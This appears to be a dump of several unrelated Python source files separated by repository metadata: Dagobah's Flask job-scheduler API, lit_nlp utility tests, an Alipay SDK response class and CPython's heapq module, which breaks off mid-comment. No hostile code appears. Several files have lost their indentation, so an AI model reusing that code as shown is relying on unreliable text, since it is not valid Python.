MotionEventFactory.register('linuxwacom', LinuxWacomMotionEventProvider)
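# The coordinate handling in _thread_run boils down to a normalization into
# [0, 1] followed by optional inversion; a stand-alone sketch with made-up
# values for illustration only.
def _normalize_sketch(value, vmin, vmax):
    return (value - vmin) / float(vmax - vmin)

raw_x, min_x, max_x = 1024, 0, 2048
x = _normalize_sketch(raw_x, min_x, max_x)   # 0.5
x_if_inverted = 1. - x                       # what invert_x=1 would produce
y = 1. - _normalize_sketch(512, 0, 2048)     # Y is flipped by default...
y_if_inverted = 1. - y                       # ...and flipped again by invert_y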
|
dagobah/daemon/api.py
|
usertesting/dagobah
| 574 |
66788
|
<reponame>usertesting/dagobah<filename>dagobah/daemon/api.py
""" HTTP API methods for Dagobah daemon. """
import StringIO
import json
from flask import request, abort, send_file
from flask_login import login_required
from .daemon import app
from .util import validate_dict, api_call, allowed_file
dagobah = app.config['dagobah']
@app.route('/api/jobs', methods=['GET'])
@login_required
@api_call
def get_jobs():
return dagobah._serialize().get('jobs', {})
@app.route('/api/job', methods=['GET'])
@login_required
@api_call
def get_job():
args = dict(request.args)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
if not job:
abort(400)
return job._serialize()
@app.route('/api/logs', methods=['GET'])
@login_required
@api_call
def get_run_log_history():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
return task.get_run_log_history()
@app.route('/api/log', methods=['GET'])
@login_required
@api_call
def get_log():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name', 'log_id'],
job_name=str,
task_name=str,
log_id=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
return task.get_run_log(args['log_id'])
@app.route('/api/head', methods=['GET'])
@login_required
@api_call
def head_task():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
stream=str,
num_lines=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
call_args = {}
for key in ['stream', 'num_lines']:
if key in args:
call_args[key] = args[key]
return task.head(**call_args)
@app.route('/api/tail', methods=['GET'])
@login_required
@api_call
def tail_task():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
stream=str,
num_lines=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
call_args = {}
for key in ['stream', 'num_lines']:
if key in args:
call_args[key] = args[key]
return task.tail(**call_args)
@app.route('/api/add_job', methods=['POST'])
@login_required
@api_call
def add_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
dagobah.add_job(args['job_name'])
@app.route('/api/delete_job', methods=['POST'])
@login_required
@api_call
def delete_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
dagobah.delete_job(args['job_name'])
@app.route('/api/start_job', methods=['POST'])
@login_required
@api_call
def start_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.start()
@app.route('/api/retry_job', methods=['POST'])
@login_required
@api_call
def retry_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.retry()
@app.route('/api/add_task_to_job', methods=['POST'])
@login_required
@api_call
def add_task_to_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_command', 'task_name'],
job_name=str,
task_command=str,
task_name=str,
task_target=str):
abort(400)
dagobah.add_task_to_job(args['job_name'],
args['task_command'],
args['task_name'],
hostname=args.get("task_target", None))
@app.route('/api/delete_task', methods=['POST'])
@login_required
@api_call
def delete_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.delete_task(args['task_name'])
@app.route('/api/add_dependency', methods=['POST'])
@login_required
@api_call
def add_dependency():
args = dict(request.form)
if not validate_dict(args,
required=['job_name',
'from_task_name',
'to_task_name'],
job_name=str,
from_task_name=str,
to_task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.add_dependency(args['from_task_name'], args['to_task_name'])
@app.route('/api/delete_dependency', methods=['POST'])
@login_required
@api_call
def delete_dependency():
args = dict(request.form)
if not validate_dict(args,
required=['job_name',
'from_task_name',
'to_task_name'],
job_name=str,
from_task_name=str,
to_task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.delete_dependency(args['from_task_name'], args['to_task_name'])
@app.route('/api/schedule_job', methods=['POST'])
@login_required
@api_call
def schedule_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'cron_schedule'],
job_name=str,
cron_schedule=str):
abort(400)
if args['cron_schedule'] == '':
args['cron_schedule'] = None
job = dagobah.get_job(args['job_name'])
job.schedule(args['cron_schedule'])
@app.route('/api/stop_scheduler', methods=['POST'])
@login_required
@api_call
def stop_scheduler():
dagobah.scheduler.stop()
@app.route('/api/restart_scheduler', methods=['POST'])
@login_required
@api_call
def restart_scheduler():
dagobah.scheduler.restart()
@app.route('/api/terminate_all_tasks', methods=['POST'])
@login_required
@api_call
def terminate_all_tasks():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.terminate_all()
@app.route('/api/kill_all_tasks', methods=['POST'])
@login_required
@api_call
def kill_all_tasks():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.kill_all()
@app.route('/api/terminate_task', methods=['POST'])
@login_required
@api_call
def terminate_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.terminate()
@app.route('/api/kill_task', methods=['POST'])
@login_required
@api_call
def kill_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.kill()
@app.route('/api/edit_job', methods=['POST'])
@login_required
@api_call
def edit_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str,
name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
del args['job_name']
job.edit(**args)
@app.route('/api/update_job_notes', methods=['POST'])
@login_required
@api_call
def update_job_notes():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'notes'],
job_name=str,
notes=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.update_job_notes(args['notes'])
@app.route('/api/edit_task', methods=['POST'])
@login_required
@api_call
def edit_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
name=str,
command=str,
soft_timeout=int,
hard_timeout=int,
hostname=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
# validate host
if 'hostname' in args and args.get('hostname') not in dagobah.get_hosts():
# Check for empty host, if so then task is no longer remote
if not args.get('hostname'):
args['hostname'] = None
else:
abort(400)
del args['job_name']
del args['task_name']
job.edit_task(task.name, **args)
@app.route('/api/set_soft_timeout', methods=['POST'])
@login_required
@api_call
def set_soft_timeout():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name', 'soft_timeout'],
job_name=str,
task_name=str,
soft_timeout=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.set_soft_timeout(args['soft_timeout'])
@app.route('/api/set_hard_timeout', methods=['POST'])
@login_required
@api_call
def set_hard_timeout():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name', 'hard_timeout'],
job_name=str,
task_name=str,
hard_timeout=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.set_hard_timeout(args['hard_timeout'])
@app.route('/api/export_job', methods=['GET'])
@login_required
def export_job():
args = dict(request.args)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
to_send = StringIO.StringIO()
to_send.write(json.dumps(job._serialize(strict_json=True)))
to_send.write('\n')
to_send.seek(0)
return send_file(to_send,
attachment_filename='%s.json' % job.name,
as_attachment=True)
@app.route('/api/import_job', methods=['POST'])
@login_required
@api_call
def import_job():
file = request.files['file']
if (file and allowed_file(file.filename, ['json'])):
dagobah.add_job_from_json(file.read(), destructive=True)
@app.route('/api/hosts', methods=['GET'])
@login_required
@api_call
def get_hosts():
return dagobah.get_hosts()
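# Illustrative client calls against the routes above, using the requests
# library. The host/port and an already-authenticated session are assumptions;
# they are not defined by this module.
import requests

base = 'http://localhost:9000'
session = requests.Session()

session.post(base + '/api/add_job', data={'job_name': 'nightly'})
session.post(base + '/api/add_task_to_job',
             data={'job_name': 'nightly',
                   'task_command': 'echo hello',
                   'task_name': 'greet'})
session.post(base + '/api/start_job', data={'job_name': 'nightly'})
print(session.get(base + '/api/jobs').json())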
|
lit_nlp/lib/utils_test.py
|
eichinflo/lit
| 2,854 |
66790
|
<gh_stars>1000+
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Lint as: python3
"""Tests for lit_nlp.lib.utils."""
from absl.testing import absltest
from lit_nlp.api import types
from lit_nlp.lib import utils
class UtilsTest(absltest.TestCase):
def test_coerce_bool(self):
self.assertTrue(utils.coerce_bool(True))
self.assertTrue(utils.coerce_bool(1))
self.assertTrue(utils.coerce_bool(2.2))
self.assertTrue(utils.coerce_bool(True))
self.assertTrue(utils.coerce_bool([0]))
self.assertTrue(utils.coerce_bool({"a": "hi"}))
self.assertTrue(utils.coerce_bool("this is true"))
self.assertFalse(utils.coerce_bool(""))
self.assertFalse(utils.coerce_bool(0))
self.assertFalse(utils.coerce_bool("0"))
self.assertFalse(utils.coerce_bool(False))
self.assertFalse(utils.coerce_bool("false"))
self.assertFalse(utils.coerce_bool("False"))
self.assertFalse(utils.coerce_bool({}))
self.assertFalse(utils.coerce_bool([]))
def test_find_keys(self):
d = {
"a": True,
"b": False,
"c": True
}
self.assertEqual(["a", "c"], utils.find_keys(d, lambda a: a))
self.assertEqual([], utils.find_keys(d, lambda a: a == "nothing"))
self.assertEqual([], utils.find_keys({}, lambda a: a))
def test_find_spec_keys(self):
spec = {
"score": types.RegressionScore(),
"scalar_foo": types.Scalar(),
"text": types.TextSegment(),
"emb_0": types.Embeddings(),
"emb_1": types.Embeddings(),
"tokens": types.Tokens(),
"generated_text": types.GeneratedText(),
}
self.assertEqual(["score"], utils.find_spec_keys(spec,
types.RegressionScore))
self.assertEqual(["text", "tokens", "generated_text"],
utils.find_spec_keys(spec,
(types.TextSegment, types.Tokens)))
self.assertEqual(["emb_0", "emb_1"],
utils.find_spec_keys(spec, types.Embeddings))
self.assertEqual([], utils.find_spec_keys(spec, types.AttentionHeads))
# Check subclasses
self.assertEqual(
list(spec.keys()), utils.find_spec_keys(spec, types.LitType))
self.assertEqual(["text", "generated_text"],
utils.find_spec_keys(spec, types.TextSegment))
self.assertEqual(["score", "scalar_foo"],
utils.find_spec_keys(spec, types.Scalar))
def test_filter_by_keys(self):
pred = lambda k: k == "a" or k == "b"
d = {
"a": True,
"b": False,
"c": True
}
self.assertDictEqual({"a": True, "b": False}, utils.filter_by_keys(d, pred))
d2 = {
"1": True,
"2": False,
"3": True
}
self.assertDictEqual({}, utils.filter_by_keys(d2, pred))
self.assertDictEqual({}, utils.filter_by_keys({}, pred))
def test_copy_and_update(self):
d = {
"a": True,
"b": False,
"c": True
}
update = {
"a": False,
"b": True
}
expected = {
"a": False,
"b": True,
"c": True
}
self.assertDictEqual(expected, utils.copy_and_update(d, update))
d = {
"a": True,
"b": False,
}
update = {
"a": False,
"c": True
}
expected = {
"a": False,
"b": False,
"c": True
}
self.assertDictEqual(expected, utils.copy_and_update(d, update))
d = {
"a": True,
"b": False,
}
update = {}
self.assertDictEqual(d, utils.copy_and_update(d, update))
d = {}
update = {
"a": False,
"c": True
}
self.assertDictEqual(update, utils.copy_and_update(d, update))
def test_remap_dict(self):
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {
"a": "a2",
"b": "b2"
}
expected = {
"a2": True,
"b2": False,
"c": True
}
self.assertDictEqual(expected, utils.remap_dict(d, remap_dict))
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {}
self.assertDictEqual(d, utils.remap_dict(d, remap_dict))
d = {}
remap_dict = {
"a": "a2",
"b": "b2"
}
self.assertDictEqual(d, utils.remap_dict(d, remap_dict))
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {
"a": "b",
}
expected = {
"b": False,
"c": True
}
self.assertDictEqual(expected, utils.remap_dict(d, remap_dict))
def test_find_all_combinations(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=2, max_element_count=3)
expected = [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3],
[1, 2, 4], [1, 3, 4], [2, 3, 4]]
self.assertListEqual(combinations, expected)
def test_find_all_combinations_max_is_greater_than_len(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=2, max_element_count=10)
expected = [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3],
[1, 2, 4], [1, 3, 4], [2, 3, 4], [1, 2, 3, 4]]
self.assertListEqual(combinations, expected)
def test_find_all_combinations_min_is_greater_than_max(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=3, max_element_count=2)
expected = []
self.assertListEqual(combinations, expected)
def test_find_all_combinations_min_is_negative(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=-1, max_element_count=2)
expected = [[1], [2], [3], [4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4],
[3, 4]]
self.assertListEqual(combinations, expected)
if __name__ == "__main__":
absltest.main()
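# A sketch of the behaviour these tests expect from find_all_combinations,
# written with itertools. This is an illustration only, not lit_nlp's
# actual implementation.
import itertools

def find_all_combinations_sketch(items, min_element_count, max_element_count):
  lo = max(min_element_count, 1)
  hi = min(max_element_count, len(items))
  return [list(c)
          for r in range(lo, hi + 1)
          for c in itertools.combinations(items, r)]

assert find_all_combinations_sketch([1, 2, 3, 4], 2, 3) == [
    [1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4],
    [1, 2, 3], [1, 2, 4], [1, 3, 4], [2, 3, 4]]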
|
alipay/aop/api/response/AlipayCommerceEducateXuexinIdentityQueryResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
66800
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateXuexinIdentityQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateXuexinIdentityQueryResponse, self).__init__()
self._college_online_tag = None
self._graduate_time = None
self._reason_code = None
@property
def college_online_tag(self):
return self._college_online_tag
@college_online_tag.setter
def college_online_tag(self, value):
self._college_online_tag = value
@property
def graduate_time(self):
return self._graduate_time
@graduate_time.setter
def graduate_time(self, value):
self._graduate_time = value
@property
def reason_code(self):
return self._reason_code
@reason_code.setter
def reason_code(self, value):
self._reason_code = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateXuexinIdentityQueryResponse, self).parse_response_content(response_content)
if 'college_online_tag' in response:
self.college_online_tag = response['college_online_tag']
if 'graduate_time' in response:
self.graduate_time = response['graduate_time']
if 'reason_code' in response:
self.reason_code = response['reason_code']
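# Hypothetical usage sketch: feed an already-fetched JSON body into the
# response object. The payload keys below are the three fields handled above;
# the request/transport plumbing and the exact payload shape are assumptions.
resp = AlipayCommerceEducateXuexinIdentityQueryResponse()
resp.parse_response_content(
    '{"college_online_tag": "Y", "graduate_time": "20240630", "reason_code": ""}')
print(resp.college_online_tag, resp.graduate_time, resp.reason_code)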
|
Lib/heapq.py
|
pelotoncycle/cpython-fork
| 332 |
66812
|
"""Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by <NAME>, augmented by <NAME> and <NAME>
__about__ = """Heap queues
[explanation by <NAME>]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
0
1 2
3 4 5 6
7 8 9 10 11 12 13 14
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
the usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedules other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, whose size is usually related to the amount of CPU memory),
followed by merging passes for these runs, where the merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to achieve that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
return returnitem
return lastelt
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappop_max(heap):
"""Maxheap version of a heappop."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup_max(heap, 0)
return returnitem
return lastelt
def _heapreplace_max(heap, item):
"""Maxheap version of a heappop followed by a heappush."""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup_max(heap, 0)
return returnitem
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
def merge(*iterables, key=None, reverse=False):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
If *key* is not None, applies a key function to each element to determine
its sort order.
>>> list(merge(['dog', 'horse'], ['cat', 'fish', 'kangaroo'], key=len))
['dog', 'cat', 'fish', 'horse', 'kangaroo']
'''
h = []
h_append = h.append
if reverse:
_heapify = _heapify_max
_heappop = _heappop_max
_heapreplace = _heapreplace_max
direction = -1
else:
_heapify = heapify
_heappop = heappop
_heapreplace = heapreplace
direction = 1
if key is None:
for order, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), order * direction, next])
except StopIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
value, order, next = s = h[0]
yield value
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
value, order, next = h[0]
yield value
yield from next.__self__
return
for order, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
value = next()
h_append([key(value), order * direction, value, next])
except StopIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
key_value, order, value, next = s = h[0]
yield value
value = next()
s[0] = key(value)
s[2] = value
_heapreplace(h, s)
except StopIteration:
_heappop(h)
if h:
key_value, order, value, next = h[0]
yield value
yield from next.__self__
# Algorithm notes for nlargest() and nsmallest()
# ==============================================
#
# Make a single pass over the data while keeping the k most extreme values
# in a heap. Memory consumption is limited to keeping k values in a list.
#
# Measured performance for random inputs:
#
# number of comparisons
# n inputs k-extreme values (average of 5 trials) % more than min()
# ------------- ---------------- --------------------- -----------------
# 1,000 100 3,317 231.7%
# 10,000 100 14,046 40.5%
# 100,000 100 105,749 5.7%
# 1,000,000 100 1,007,751 0.8%
# 10,000,000 100 10,009,401 0.1%
#
# Theoretical number of comparisons for k smallest of n random inputs:
#
# Step Comparisons Action
# ---- -------------------------- ---------------------------
# 1 1.66 * k heapify the first k-inputs
# 2 n - k compare remaining elements to top of heap
# 3 k * (1 + lg2(k)) * ln(n/k) replace the topmost value on the heap
# 4 k * lg2(k) - (k/2) final sort of the k most extreme values
#
# Combining and simplifying for a rough estimate gives:
#
# comparisons = n + k * (log(k, 2) * log(n/k) + log(k, 2) + log(n/k))
#
# Computing the number of comparisons for step 3:
# -----------------------------------------------
# * For the i-th new value from the iterable, the probability of being in the
# k most extreme values is k/i. For example, the probability of the 101st
# value seen being in the 100 most extreme values is 100/101.
# * If the value is a new extreme value, the cost of inserting it into the
# heap is 1 + log(k, 2).
# * The probability times the cost gives:
# (k/i) * (1 + log(k, 2))
# * Summing across the remaining n-k elements gives:
# sum((k/i) * (1 + log(k, 2)) for i in range(k+1, n+1))
# * This reduces to:
# (H(n) - H(k)) * k * (1 + log(k, 2))
# * Where H(n) is the n-th harmonic number estimated by:
# gamma = 0.5772156649
# H(n) = log(n, e) + gamma + 1 / (2 * n)
# http://en.wikipedia.org/wiki/Harmonic_series_(mathematics)#Rate_of_divergence
# * Substituting the H(n) formula:
# comparisons = k * (1 + log(k, 2)) * (log(n/k, e) + (1/n - 1/k) / 2)
#
# Worst-case for step 3:
# ----------------------
# In the worst case, the input data is reversed sorted so that every new element
# must be inserted in the heap:
#
# comparisons = 1.66 * k + log(k, 2) * (n - k)
#
# Alternative Algorithms
# ----------------------
# Other algorithms were not used because they:
# 1) Took much more auxiliary memory,
# 2) Made multiple passes over the data.
# 3) Made more comparisons in common cases (small k, large n, semi-random input).
# See the more detailed comparison of approach at:
